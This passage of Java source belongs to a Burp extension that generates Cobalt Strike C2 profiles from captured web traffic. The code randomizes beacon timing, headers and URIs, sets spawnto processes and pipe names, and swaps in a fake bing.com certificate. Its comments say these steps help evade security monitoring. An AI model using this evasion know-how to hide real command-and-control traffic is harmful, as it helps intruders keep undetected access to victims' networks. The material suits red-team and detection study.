dnsBeacon.setDns_idle(file.readLine("dns_idle")); 28 | dnsBeacon.setDns_stager_prepend(file.readLine("dns_stager_prepend")); 29 | dnsBeacon.setDns_stager_subhost(file.readLine("dns_stager_subhost")); 30 | } catch (IOException e) { 31 | e.printStackTrace(); 32 | } 33 | return dnsBeacon; 34 | } 35 | 36 | @Override 37 | public Map putdataDnsBeacon() { 38 | dataMap.put("maxdns",dnsBeacon.getMaxdns()); 39 | dataMap.put("dns_max_txt",dnsBeacon.getDns_max_txt()); 40 | dataMap.put("dns_idle",dnsBeacon.getDns_idle()); 41 | dataMap.put("dns_sleep",dnsBeacon.getDns_sleep()); 42 | dataMap.put("dns_stager_prepend",dnsBeacon.getDns_stager_prepend()); 43 | dataMap.put("dns_stager_subhost",dnsBeacon.getDns_stager_subhost()); 44 | return dataMap; 45 | } 46 | 47 | public String lookMaxdns(){ 48 | /* 49 | maxdns配置 Cobalt Strike 在上传数据时使用的最大主机名长度,默认值为 255。 50 | 这可能会在某些安全设备上标记。此设置配置得越低,可能生成的 DNS 流量就越多。 51 | 无论哪种方式,目标都会看到整体 DNS 流量激增,但在将此设置更改为较低值时要记住这一点很重要。 52 | */ 53 | return String.valueOf(new Random().nextInt(6)+249); 54 | } 55 | 56 | public String lookDns_max_txt(){ 57 | return "248"; 58 | } 59 | 60 | public String lookDns_sleep(){ 61 | return "0"; 62 | } 63 | 64 | } 65 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/impl/HttpGetBeaconDaoImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao.impl; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.IHttpRequestResponse; 5 | import burp.IRequestInfo; 6 | import burp.IResponseInfo; 7 | import com.test.burp.dao.HttpGetBeaconDao; 8 | import com.test.burp.model.HttpGetBeacon; 9 | 10 | import java.util.HashMap; 11 | import java.util.List; 12 | import java.util.Map; 13 | /** 14 | * @program: JustC2file 15 | * @author: Peithon 16 | * @create: 2022-01-08 09:09 17 | **/ 18 | public class HttpGetBeaconDaoImpl implements HttpGetBeaconDao { 19 | private HttpGetBeacon httpGetBeacon = new HttpGetBeacon(); 20 | private Map dataMap = new HashMap(); 21 | private AnalyzeInfo analyzeInfo = new AnalyzeInfo(); 22 | @Override 23 | public HttpGetBeacon dataHttpGetBeacon(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message) { 24 | byte[] req = message.getRequest(); 25 | IRequestInfo analyzedRequest = callbacks.getHelpers().analyzeRequest(req); 26 | List headers = analyzedRequest.getHeaders(); 27 | httpGetBeacon.setUri(analyzeInfo.formatUri(lookUri(headers))); 28 | httpGetBeacon.setHost(analyzeInfo.lookHost(headers)); 29 | List listhead = analyzeInfo.formatHeaders(analyzeInfo.lookHeaders(headers)); 30 | httpGetBeacon.setGet_client_header1(listhead.get(0)); 31 | httpGetBeacon.setGet_client_header2(listhead.get(1)); 32 | httpGetBeacon.setGet_client_header3(listhead.get(2)); 33 | httpGetBeacon.setGet_client_header4(listhead.get(3)); 34 | // httpGetBeacon.setGet_metadata_encode(analyzeInfo.getEncode()); 35 | IResponseInfo analyzeResponse = callbacks.getHelpers().analyzeResponse(message.getResponse()); 36 | List iheaders = analyzeResponse.getHeaders(); 37 | List listihead = analyzeInfo.formatHeaders(analyzeInfo.lookHeaders(iheaders)); 38 | httpGetBeacon.setGet_server_header1(listihead.get(0)); 39 | httpGetBeacon.setGet_server_header2(listihead.get(1)); 40 | httpGetBeacon.setGet_server_header3(listihead.get(2)); 41 | httpGetBeacon.setGet_server_header4(listihead.get(3)); 42 | //httpGetBeacon.setGet_server_header(analyzeInfo.formatHeaders(analyzeInfo.lookHeaders(iheaders))); 43 | httpGetBeacon.setGet_server_contentType(analyzeInfo.lookContentType(iheaders)); 44 | httpGetBeacon.setGet_server_server(analyzeInfo.lookServer(iheaders)); 45 | httpGetBeacon.setGet_server_encode(analyzeInfo.getEncode()); 46 | if(analyzeInfo.isExistResponseBody(callbacks,message)) { 47 | String resp = new String(message.getResponse()); 48 | int bodyOffset = analyzeResponse.getBodyOffset(); 49 | List list = analyzeInfo.analyzeBody(resp.substring(bodyOffset)); 50 | httpGetBeacon.setGet_server_prepend(list.get(1)); 51 | httpGetBeacon.setGet_server_prepend2(list.get(0)); 52 | httpGetBeacon.setGet_server_append(list.get(2)); 53 | }else{ 54 | httpGetBeacon.setGet_server_prepend(""); 55 | httpGetBeacon.setGet_server_prepend2(""); 56 | httpGetBeacon.setGet_server_append(""); 57 | } 58 | return httpGetBeacon; 59 | } 60 | 61 | @Override 62 | public Map putdataHttpGetBeacon() { 63 | dataMap.put("http_get_uri", httpGetBeacon.getUri()); 64 | dataMap.put("get_client_header1",httpGetBeacon.getGet_client_header1()); 65 | dataMap.put("get_client_header2",httpGetBeacon.getGet_client_header2()); 66 | dataMap.put("get_client_header3",httpGetBeacon.getGet_client_header3()); 67 | dataMap.put("get_client_header4",httpGetBeacon.getGet_client_header4()); 68 | dataMap.put("http_get_host",httpGetBeacon.getHost()); 69 | dataMap.put("http_getReq_Server",httpGetBeacon.getGet_server_server()); 70 | dataMap.put("http_getReq_ContentType",httpGetBeacon.getGet_server_contentType()); 71 | dataMap.put("get_server_header1",httpGetBeacon.getGet_server_header1()); 72 | dataMap.put("get_server_header2",httpGetBeacon.getGet_server_header2()); 73 | dataMap.put("get_server_header3",httpGetBeacon.getGet_server_header3()); 74 | dataMap.put("get_server_header4",httpGetBeacon.getGet_server_header4()); 75 | //dataMap.put("get_metadata_encode",httpGetBeacon.getGet_metadata_encode()); 76 | dataMap.put("get_server_encode",httpGetBeacon.getGet_server_encode()); 77 | dataMap.put("get_server_prepend",httpGetBeacon.getGet_server_prepend()); 78 | dataMap.put("get_server_prepend2",httpGetBeacon.getGet_server_prepend2()); 79 | dataMap.put("get_server_append",httpGetBeacon.getGet_server_append()); 80 | return dataMap; 81 | } 82 | 83 | public String lookUri(List headers){ 84 | String uri = ""; 85 | for (String header : headers) { 86 | if (header.startsWith("GET")) { 87 | uri = header.split("\\s+")[1].split("[?]")[0]; 88 | } 89 | } 90 | return uri; 91 | } 92 | 93 | 94 | } 95 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/impl/HttpPostBeaconDaoImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao.impl; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.IHttpRequestResponse; 5 | import burp.IRequestInfo; 6 | import burp.IResponseInfo; 7 | import com.test.burp.dao.HttpPostBeaconDao; 8 | import com.test.burp.model.HttpPostBeacon; 9 | 10 | import java.io.IOException; 11 | import java.util.*; 12 | import java.util.stream.Collectors; 13 | 14 | /** 15 | * @program: JustC2file 16 | * @author: Peithon 17 | * @github: https://github.com/Peithon/JustC2file 18 | * @create: 2022-01-10 15:44 19 | **/ 20 | public class HttpPostBeaconDaoImpl implements HttpPostBeaconDao { 21 | private HttpPostBeacon httpPostBeacon = new HttpPostBeacon(); 22 | private Map dataMap = new HashMap(); 23 | private AnalyzeInfo analyzeInfo = new AnalyzeInfo(); 24 | private LoadFile file = new LoadFile(); 25 | @Override 26 | public HttpPostBeacon dataHttpPostBeacon(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message) { 27 | byte[] req = message.getRequest(); 28 | IRequestInfo analyzedRequest = callbacks.getHelpers().analyzeRequest(req); 29 | List headers = analyzedRequest.getHeaders(); 30 | List listhead = analyzeInfo.formatHeaders(analyzeInfo.lookHeaders(headers)); 31 | httpPostBeacon.setPost_client_header1(listhead.get(0)); 32 | httpPostBeacon.setPost_client_header2(listhead.get(1)); 33 | httpPostBeacon.setPost_client_header3(listhead.get(2)); 34 | httpPostBeacon.setPost_client_header4(listhead.get(3)); 35 | httpPostBeacon.setHttp_post_uri(analyzeInfo.formatUri(lookUri(headers))); 36 | httpPostBeacon.setHttp_post_host(analyzeInfo.lookHost(headers)); 37 | httpPostBeacon.setPost_client_content(analyzeInfo.lookContentType(headers)); 38 | List param = lookParameter(); 39 | httpPostBeacon.setPost_client_parameter1(param.get(0)); 40 | httpPostBeacon.setPost_client_parameter2(param.get(1)); 41 | httpPostBeacon.setPost_client_parameter3(param.get(2)); 42 | //httpPostBeacon.setPost_client_encode(analyzeInfo.getEncode()); 43 | IResponseInfo analyzeResponse = callbacks.getHelpers().analyzeResponse(message.getResponse()); 44 | List iheaders = analyzeResponse.getHeaders(); 45 | List listihead = analyzeInfo.formatHeaders(analyzeInfo.lookHeaders(iheaders)); 46 | httpPostBeacon.setPost_server_header1(listihead.get(0)); 47 | httpPostBeacon.setPost_server_header2(listihead.get(1)); 48 | httpPostBeacon.setPost_server_header3(listihead.get(2)); 49 | httpPostBeacon.setPost_server_header4(listihead.get(3)); 50 | httpPostBeacon.setPost_server_server(analyzeInfo.lookServer(iheaders)); 51 | httpPostBeacon.setPost_server_content(analyzeInfo.lookContentType(iheaders)); 52 | httpPostBeacon.setPost_server_encode(analyzeInfo.getEncode()); 53 | if(analyzeInfo.isExistResponseBody(callbacks,message)) { 54 | String resp = new String(message.getResponse()); 55 | int bodyOffset = analyzeResponse.getBodyOffset(); 56 | List list = analyzeInfo.analyzeBody(resp.substring(bodyOffset)); 57 | //第二行 58 | httpPostBeacon.setPost_server_prepend(list.get(1)); 59 | //第一行 60 | httpPostBeacon.setPost_server_prepend2(list.get(0)); 61 | httpPostBeacon.setPost_server_append(list.get(2)); 62 | }else{ 63 | httpPostBeacon.setPost_server_prepend(""); 64 | httpPostBeacon.setPost_server_prepend2(""); 65 | httpPostBeacon.setPost_server_append(""); 66 | } 67 | return httpPostBeacon; 68 | } 69 | 70 | @Override 71 | public Map putdataHttpPostBeacon() { 72 | dataMap.put("http_post_uri",httpPostBeacon.getHttp_post_uri()); 73 | dataMap.put("post_client_content",httpPostBeacon.getPost_client_content()); 74 | dataMap.put("post_client_header1",httpPostBeacon.getPost_client_header1()); 75 | dataMap.put("post_client_header2",httpPostBeacon.getPost_client_header2()); 76 | dataMap.put("post_client_header3",httpPostBeacon.getPost_client_header3()); 77 | dataMap.put("post_client_header4",httpPostBeacon.getPost_client_header4()); 78 | dataMap.put("http_post_host",httpPostBeacon.getHttp_post_host()); 79 | dataMap.put("post_client_parameter1",httpPostBeacon.getPost_client_parameter1()); 80 | dataMap.put("post_client_parameter2",httpPostBeacon.getPost_client_parameter2()); 81 | dataMap.put("post_client_parameter3",httpPostBeacon.getPost_client_parameter3()); 82 | dataMap.put("post_server_server",httpPostBeacon.getPost_server_server()); 83 | dataMap.put("post_server_content",httpPostBeacon.getPost_server_content()); 84 | dataMap.put("post_server_header1",httpPostBeacon.getPost_server_header1()); 85 | dataMap.put("post_server_header2",httpPostBeacon.getPost_server_header2()); 86 | dataMap.put("post_server_header3",httpPostBeacon.getPost_server_header3()); 87 | dataMap.put("post_server_header4",httpPostBeacon.getPost_server_header4()); 88 | //dataMap.put("post_client_encode",httpPostBeacon.getPost_client_encode()); 89 | dataMap.put("post_server_encode",httpPostBeacon.getPost_server_encode()); 90 | dataMap.put("post_server_prepend",httpPostBeacon.getPost_server_prepend()); 91 | dataMap.put("post_server_prepend2",httpPostBeacon.getPost_server_prepend2()); 92 | dataMap.put("post_server_append",httpPostBeacon.getPost_server_append()); 93 | return dataMap; 94 | } 95 | 96 | public String lookUri(List headers){ 97 | String uri = ""; 98 | for (String header : headers) { 99 | if (header.startsWith("POST")) { 100 | uri = header.split("\\s+")[1].split("[?]")[0]; 101 | } 102 | } 103 | return uri; 104 | } 105 | 106 | public List lookParameter(){ 107 | int randnum = new Random().nextInt(2)+2; 108 | List list = new ArrayList<>(searchParam(randnum)); 109 | List line = new ArrayList<>(); 110 | String str = "qwertyuiopasdfghjklzxcvbnmZXCVBNMLKJHGFDSAQWERTYUIOP"; 111 | for (int i = 0; i< 3;i++){ 112 | line.add(i,""); 113 | } 114 | for (int j = 0; j < randnum; j++){ 115 | //将字符str顺序打乱 116 | String[] liststr= str.split(""); 117 | StringBuilder strBuff = new StringBuilder(); 118 | Collections.shuffle(Arrays.asList(liststr)); 119 | StringBuilder out= new StringBuilder(""); 120 | for(String s:liststr){ 121 | out.append(s); 122 | } 123 | str = out.toString(); 124 | int num = new Random().nextInt(7)+6; 125 | for (int i = 0 ; i < num; i++){ 126 | int number = new Random().nextInt(str.length()); 127 | strBuff.append(str.charAt(number)); 128 | } 129 | line.set(j,"parameter \""+list.get(j)+"\" \""+strBuff+"\";"); 130 | } 131 | return line; 132 | } 133 | 134 | public List searchParam(int randnum) { 135 | List list = new ArrayList<>(); 136 | for (int i=0; i < randnum; i++){ 137 | try { 138 | list.add(file.readLine("parameters")); 139 | } catch (IOException e) { 140 | e.printStackTrace(); 141 | } 142 | } 143 | list = list.stream().distinct().collect(Collectors.toList()); 144 | if (list.size() == randnum){ 145 | return list; 146 | }else { 147 | return searchParam(randnum); 148 | } 149 | } 150 | } 151 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/impl/HttpStagerDaoImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao.impl; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.IHttpRequestResponse; 5 | import burp.IRequestInfo; 6 | import burp.IResponseInfo; 7 | import com.test.burp.dao.HttpStagerDao; 8 | import com.test.burp.model.HttpStager; 9 | 10 | import java.io.IOException; 11 | import java.util.HashMap; 12 | import java.util.List; 13 | import java.util.Map; 14 | 15 | /** 16 | * @program: JustC2file 17 | * @author: Peithon 18 | * @github: https://github.com/Peithon/JustC2file 19 | * @create: 2022-01-11 14:55 20 | **/ 21 | public class HttpStagerDaoImpl implements HttpStagerDao { 22 | //需要多个stager时换成List 23 | //List list = new ArrayList(); 24 | private HttpStager httpStager = new HttpStager(); 25 | private LoadFile file = new LoadFile(); 26 | private AnalyzeInfo analyzeInfo = new AnalyzeInfo(); 27 | private Map dataMap = new HashMap(); 28 | @Override 29 | public HttpStager dataHttpStager(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message) { 30 | 31 | IResponseInfo analyzeResponse = callbacks.getHelpers().analyzeResponse(message.getResponse()); 32 | List iheaders = analyzeResponse.getHeaders(); 33 | List listihead = analyzeInfo.formatHeaders(analyzeInfo.lookHeaders(iheaders)); 34 | httpStager.setServer_header1(listihead.get(0)); 35 | httpStager.setServer_header2(listihead.get(1)); 36 | httpStager.setServer_header3(listihead.get(2)); 37 | httpStager.setServer_header4(listihead.get(3)); 38 | httpStager.setServer_Content_Type(analyzeInfo.lookContentType(iheaders)); 39 | httpStager.setServer_Server(analyzeInfo.lookServer(iheaders)); 40 | // httpStager.setOutput_encode(analyzeInfo.getEncode()); 41 | if(analyzeInfo.isExistResponseBody(callbacks,message)){ 42 | String resp = new String(message.getResponse()); 43 | int bodyOffset = analyzeResponse.getBodyOffset(); 44 | List list = analyzeInfo.analyzeBody(resp.substring(bodyOffset)); 45 | httpStager.setOutput_prepend(list.get(1)); 46 | httpStager.setOutput_prepend2(list.get(0)); 47 | httpStager.setOutput_append(list.get(2)); 48 | }else{ 49 | httpStager.setOutput_prepend(""); 50 | httpStager.setOutput_prepend2(""); 51 | httpStager.setOutput_append(""); 52 | } 53 | byte[] req = message.getRequest(); 54 | IRequestInfo analyzedRequest = callbacks.getHelpers().analyzeRequest(req); 55 | List headers = analyzedRequest.getHeaders(); 56 | httpStager.setClient_Accept(lookAccept(headers)); 57 | try { 58 | String stager_uri = lookStager_uri(); 59 | if(stager_uri.split("/").length < 2){ 60 | httpStager.setUri_x86(stager_uri.split("\\s+")[0]); 61 | httpStager.setUri_x64(stager_uri.split("\\s+")[1]); 62 | }else { 63 | httpStager.setUri_x86(lookUri(headers)); 64 | httpStager.setUri_x64("/_"+lookUri(headers)); 65 | } 66 | 67 | } catch (IOException e) { 68 | e.printStackTrace(); 69 | } 70 | return httpStager; 71 | } 72 | 73 | @Override 74 | public Map putdataHttpStager() { 75 | dataMap.put("stager_uri_x86",httpStager.getUri_x86()); 76 | dataMap.put("stager_uri_x64",httpStager.getUri_x64()); 77 | dataMap.put("stager_server_ContentType",httpStager.getServer_Content_Type()); 78 | dataMap.put("stager_server_Server",httpStager.getServer_Server()); 79 | dataMap.put("stager_server_header1",httpStager.getServer_header1()); 80 | dataMap.put("stager_server_header2",httpStager.getServer_header2()); 81 | dataMap.put("stager_server_header3",httpStager.getServer_header3()); 82 | dataMap.put("stager_server_header4",httpStager.getServer_header4()); 83 | dataMap.put("stager_client_Accept",httpStager.getClient_Accept()); 84 | dataMap.put("stager_output_prepend",httpStager.getOutput_prepend()); 85 | dataMap.put("stager_output_append",httpStager.getOutput_append()); 86 | // dataMap.put("stager_output_encode",httpStager.getOutput_encode()); 87 | dataMap.put("stager_output_prepend2",httpStager.getOutput_prepend2()); 88 | return dataMap; 89 | } 90 | 91 | public String lookStager_uri() throws IOException { 92 | return file.readLine("stager_uri"); 93 | } 94 | 95 | public String lookUri(List headers){ 96 | String uri = ""; 97 | for (String header : headers) { 98 | if (header.startsWith("GET")) { 99 | uri = header.split("\\s+")[1].split("[?]")[0]; 100 | break; 101 | }else if(header.startsWith("POST")){ 102 | uri = header.split("\\s+")[1].split("[?]")[0]; 103 | break; 104 | } 105 | } 106 | return uri; 107 | } 108 | 109 | public String lookAccept(List headers){ 110 | String accept = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 111 | for (String header : headers) { 112 | if (header.startsWith("Accept:")) { 113 | accept = header.split("[:]\\s+")[1].trim(); 114 | break; 115 | } 116 | } 117 | return accept; 118 | } 119 | } 120 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/impl/HttpsCertificateDaoImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao.impl; 2 | 3 | import com.test.burp.dao.HttpsCertificateDao; 4 | import com.test.burp.model.HttpsCertificate; 5 | 6 | import java.util.HashMap; 7 | import java.util.List; 8 | import java.util.Map; 9 | import java.util.Random; 10 | 11 | import static java.util.Arrays.asList; 12 | /** 13 | * @program: JustC2file 14 | * @author: Peithon 15 | * @create: 2022-01-08 09:09 16 | **/ 17 | public class HttpsCertificateDaoImpl implements HttpsCertificateDao { 18 | private HttpsCertificate httpsCertificate= new HttpsCertificate(); 19 | Map dataMap = new HashMap(); 20 | 21 | @Override 22 | public HttpsCertificate dataHttpsCertificate() { 23 | httpsCertificate.setC(lookCertificateC()); 24 | httpsCertificate.setCn(lookCertificateCN()); 25 | httpsCertificate.setO(lookCertificateOU()); 26 | httpsCertificate.setOu(lookCertificateOU()); 27 | httpsCertificate.setValidity(lookCertificateV()); 28 | return httpsCertificate; 29 | } 30 | 31 | @Override 32 | public Map putdataHttpsCertificate() { 33 | /* 34 | * CS在创建Beacon HTTPS监听时,是包含SSL证书的,该证书是CS默认的证书,其中包含了CobaltStrike等关键字信息,不修改的情况下,会被直接监测到。 35 | * */ 36 | dataMap.put("https_certificate_C",httpsCertificate.getC()); 37 | dataMap.put("https_certificate_V",httpsCertificate.getValidity()); 38 | dataMap.put("https_certificate_CN",httpsCertificate.getCn()); 39 | dataMap.put("https_certificate_OU",httpsCertificate.getOu()); 40 | dataMap.put("https_certificate_O",httpsCertificate.getO()); 41 | return dataMap; 42 | } 43 | public String lookCertificateC(){ 44 | //Certificate C 的值 45 | List certlistc = asList( 46 | "AF", "AX", "AL", "DZ", "AS", "AD", "AO", "AI", "AQ", "AG", "AR", 47 | "AM", "AW", "AU", "AT", "AZ", "BS", "BH", "BD", "BB", "BY", "BE", 48 | "BZ", "BJ", "BM", "BT", "BO", "BQ", "BA", "BW", "BV", "BR", "IO", 49 | "BN", "BG", "BF", "BI", "CV", "KH", "CM", "CA", "KY", "CF", "TD", 50 | "CL", "CN", "CX", "CC", "CO", "KM", "CG", "CD", "CK", "CR", "CI", 51 | "HR", "CU", "CW", "CY", "CZ", "DK", "DJ", "DM", "DO", "EC", "EG", 52 | "SV", "GQ", "ER", "EE", "ET", "FK", "FO", "FJ", "FI", "FR", "GF", 53 | "PF", "TF", "GA", "GM", "GE", "DE", "GH", "GI", "GR", "GL", "GD", 54 | "GP", "GU", "GT", "GG", "GN", "GW", "GY", "HT", "HM", "VA", "HN", 55 | "HK", "HU", "IS", "IN", "ID", "IR", "IQ", "IE", "IM", "IL", "IT", 56 | "JM", "JP", "JE", "JO", "KZ", "KE", "KI", "KP", "KR", "KW", "KG", 57 | "LA", "LV", "LB", "LS", "LR", "LY", "LI", "LT", "LU", "MO", "MK", 58 | "MG", "MW", "MY", "MV", "ML", "MT", "MH", "MQ", "MR", "MU", "YT", 59 | "MX", "FM", "MD", "MC", "MN", "ME", "MS", "MA", "MZ", "MM", "NA", 60 | "NR", "NP", "NL", "NC", "NZ", "NI", "NE", "NG", "NU", "NF", "MP", 61 | "NO", "OM", "PK", "PW", "PS", "PA", "PG", "PY", "PE", "PH", "PN", 62 | "PL", "PT", "PR", "QA", "RE", "RO", "RU", "RW", "BL", "SH", "KN", 63 | "LC", "MF", "PM", "VC", "WS", "SM", "ST", "SA", "SN", "RS", "SC", 64 | "SL", "SG", "SX", "SK", "SI", "SB", "SO", "ZA", "GS", "SS", "ES", 65 | "LK", "SD", "SR", "SJ", "SZ", "SE", "CH", "SY", "TW", "TJ", "TZ", 66 | "TH", "TL", "TG", "TK", "TO", "TT", "TN", "TR", "TM", "TC", "TV", 67 | "UG", "UA", "AE", "GB", "US", "UM", "UY", "UZ", "VU", "VE", "VN", 68 | "VG", "VI", "WF", "EH", "YE", "ZM", "ZW" 69 | ); 70 | return certlistc.get(new Random().nextInt(certlistc.size())); 71 | } 72 | 73 | public String lookCertificateV(){ 74 | return "365"; 75 | } 76 | 77 | public String lookCertificateCN(){ 78 | return "www.bing.com"; 79 | } 80 | public String lookCertificateOU(){ 81 | return "bing.com"; 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/impl/LoadFile.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao.impl; 2 | 3 | import org.apache.commons.io.IOUtils; 4 | 5 | import java.io.IOException; 6 | import java.io.InputStream; 7 | import java.util.List; 8 | import java.util.Random; 9 | /** 10 | * @program: JustC2file 11 | * @author: Peithon 12 | * @create: 2022-01-08 09:09 13 | **/ 14 | public class LoadFile { 15 | public String readLine(String filename) throws IOException{ 16 | String line = ""; 17 | InputStream input = this.getClass().getResourceAsStream("/wordlists/"+filename); 18 | try { 19 | //assert input != null; 20 | List lines = IOUtils.readLines(input,"UTF-8"); 21 | line = lines.get(new Random().nextInt(lines.size())).trim(); 22 | } catch (IOException e) { 23 | e.printStackTrace(); 24 | } 25 | return line; 26 | } 27 | } 28 | 29 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/impl/PersiancatDaoImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao.impl; 2 | 3 | import com.test.burp.dao.PersiancatDao; 4 | import com.test.burp.model.Persiancat; 5 | 6 | import java.io.IOException; 7 | import java.text.SimpleDateFormat; 8 | import java.util.Date; 9 | import java.util.HashMap; 10 | import java.util.Map; 11 | import java.util.Random; 12 | /** 13 | * @program: JustC2file 14 | * @author: Peithon 15 | * @create: 2022-01-08 09:09 16 | **/ 17 | public class PersiancatDaoImpl implements PersiancatDao { 18 | private Persiancat persiancat= new Persiancat(); 19 | private LoadFile file = new LoadFile(); 20 | Map dataMap = new HashMap(); 21 | @Override 22 | public Persiancat dataPersiancat() { 23 | persiancat.setTimestamp(lookTimestamp()); 24 | persiancat.setSample_name(lookSample_name()); 25 | persiancat.setSleeptime(lookSleeptime()); 26 | persiancat.setJitter(lookJitter()); 27 | persiancat.setData_jitter(lookDataJitter()); 28 | persiancat.setHost_stage(lookHost_stage()); 29 | persiancat.setTcp_port(lookTcp_port()); 30 | try { 31 | persiancat.setUseragent(file.readLine("useragents")); 32 | } catch (IOException e) { 33 | e.printStackTrace(); 34 | } 35 | return persiancat; 36 | } 37 | 38 | @Override 39 | public Map putdataPersiancat() { 40 | dataMap.put("timestamp", persiancat.getTimestamp()); 41 | dataMap.put("sample_name", persiancat.getSample_name()); 42 | dataMap.put("sleeptime",persiancat.getSleeptime()); 43 | dataMap.put("jitter",persiancat.getJitter()); 44 | dataMap.put("data_jitter",persiancat.getData_jitter()); 45 | dataMap.put("useragent",persiancat.getUseragent()); 46 | /* 47 | * 默认的DNS_IDLE为0.0.0.0,也可能被监听到 48 | * */ 49 | dataMap.put("tcp_port",persiancat.getTcp_port()); 50 | /* 51 | CS会在目标机放一个小的payload,然后由这个小的payload去下载大马,这个过程是个分段过程,不是一次下载回来的; 52 | 其中下载请求相关的流量特征,可以通过http-stager来定义 53 | */ 54 | dataMap.put("host_stage",persiancat.getHost_stage()); 55 | return dataMap; 56 | } 57 | 58 | public String lookTimestamp(){ 59 | // C2配置文件创建时间 60 | return new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date()); 61 | } 62 | 63 | public String lookSample_name(){ 64 | //脚本名称 65 | return "CobaltStrike Beacon"; 66 | } 67 | public String lookSleeptime(){ 68 | //sleeptime 设置用于配置 Beacons 默认签入的频率(以毫秒为单位),默认60秒。 69 | return String.valueOf((new Random().nextInt(25)+30)*1000); 70 | } 71 | public String lookJitter(){ 72 | /*jitter用于按指定的百分比改变签入间隔;它接受 0 - 99 的值。 73 | 例如: 74 | set sleeptime "60000"; 75 | set jitter "20"; 76 | jitter(抖动率)指定的随机时间量,Beacons 将在 48(60-60*20%) 到 72(60+60*20%) 秒之间的任何时间签入。 77 | 增加签入抖动可以减少某些安全监控解决方案检测到的机会 78 | */ 79 | return String.valueOf(new Random().nextInt(20)+1); 80 | } 81 | 82 | public String lookDataJitter(){ 83 | /*将随机长度字符串(最多 data_jitter 值)附加到 http-get 和 http-post 服务器输出。 84 | */ 85 | return String.valueOf(new Random().nextInt(14)+97); 86 | } 87 | 88 | public String lookTcp_port(){ 89 | //默认端口是 4444。可以动态更改,但在切换到动态端口之前,将始终首先使用配置文件中设置的端口。 90 | return String.valueOf(new Random().nextInt(40000)+12500); 91 | } 92 | 93 | public String lookHost_stage(){ 94 | /*传输数据、Exp时,内容建议分段传输,和运输投资类似,分批的安全性比一次的更高。 95 | true表示进行分段传输,false表示不进行分段传输,这里默认配置为true 96 | */ 97 | return "true"; 98 | } 99 | } 100 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/impl/PostExDaoImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao.impl; 2 | 3 | import com.test.burp.dao.PostExDao; 4 | import com.test.burp.model.PostEx; 5 | 6 | import java.io.IOException; 7 | import java.util.HashMap; 8 | import java.util.Map; 9 | /** 10 | * @program: JustC2file 11 | * @author: Peithon 12 | * @create: 2022-01-08 09:09 13 | **/ 14 | public class PostExDaoImpl implements PostExDao { 15 | private PostEx postEx = new PostEx(); 16 | private LoadFile file = new LoadFile(); 17 | Map dataMap = new HashMap(); 18 | @Override 19 | public PostEx dataPostEx() { 20 | try { 21 | String spawnto = lookSpawnto(); 22 | postEx.setSpawnto_x86(spawnto.split("\\s+")[0]); 23 | postEx.setSpawnto_x64(spawnto.split("\\s+")[1]); 24 | postEx.setPipename(file.readLine("pipename")); 25 | } catch (IOException e) { 26 | e.printStackTrace(); 27 | } 28 | return postEx; 29 | } 30 | 31 | @Override 32 | public Map putdataPostEx() { 33 | dataMap.put("spawnto_x86",postEx.getSpawnto_x86()); 34 | dataMap.put("spawnto_x64",postEx.getSpawnto_x64()); 35 | dataMap.put("pipename",postEx.getPipename()); 36 | return dataMap; 37 | } 38 | 39 | public String lookSpawnto() throws IOException { 40 | return file.readLine("spawnto"); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/model/DnsBeacon.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.model; 2 | 3 | /** 4 | * @program: JustC2file 5 | * @author: Peithon 6 | * @github: https://github.com/Peithon/JustC2file 7 | * @create: 2022-01-12 12:21 8 | **/ 9 | public class DnsBeacon { 10 | private String dns_idle; 11 | private String dns_max_txt; 12 | private String dns_sleep; 13 | private String dns_ttl; 14 | private String maxdns; 15 | private String dns_stager_prepend; 16 | private String dns_stager_subhost; 17 | private String beacon; 18 | private String get_A; 19 | private String get_AAAA; 20 | private String get_TXT; 21 | private String put_metadata; 22 | private String put_output; 23 | private String ns_response; 24 | 25 | public String getDns_idle() { 26 | return dns_idle; 27 | } 28 | 29 | public void setDns_idle(String dns_idle) { 30 | this.dns_idle = dns_idle; 31 | } 32 | 33 | public String getDns_max_txt() { 34 | return dns_max_txt; 35 | } 36 | 37 | public void setDns_max_txt(String dns_max_txt) { 38 | this.dns_max_txt = dns_max_txt; 39 | } 40 | 41 | public String getDns_sleep() { 42 | return dns_sleep; 43 | } 44 | 45 | public void setDns_sleep(String dns_sleep) { 46 | this.dns_sleep = dns_sleep; 47 | } 48 | 49 | public String getDns_ttl() { 50 | return dns_ttl; 51 | } 52 | 53 | public void setDns_ttl(String dns_ttl) { 54 | this.dns_ttl = dns_ttl; 55 | } 56 | 57 | public String getMaxdns() { 58 | return maxdns; 59 | } 60 | 61 | public void setMaxdns(String maxdns) { 62 | this.maxdns = maxdns; 63 | } 64 | 65 | public String getDns_stager_prepend() { 66 | return dns_stager_prepend; 67 | } 68 | 69 | public void setDns_stager_prepend(String dns_stager_prepend) { 70 | this.dns_stager_prepend = dns_stager_prepend; 71 | } 72 | 73 | public String getDns_stager_subhost() { 74 | return dns_stager_subhost; 75 | } 76 | 77 | public void setDns_stager_subhost(String dns_stager_subhost) { 78 | this.dns_stager_subhost = dns_stager_subhost; 79 | } 80 | 81 | public String getBeacon() { 82 | return beacon; 83 | } 84 | 85 | public void setBeacon(String beacon) { 86 | this.beacon = beacon; 87 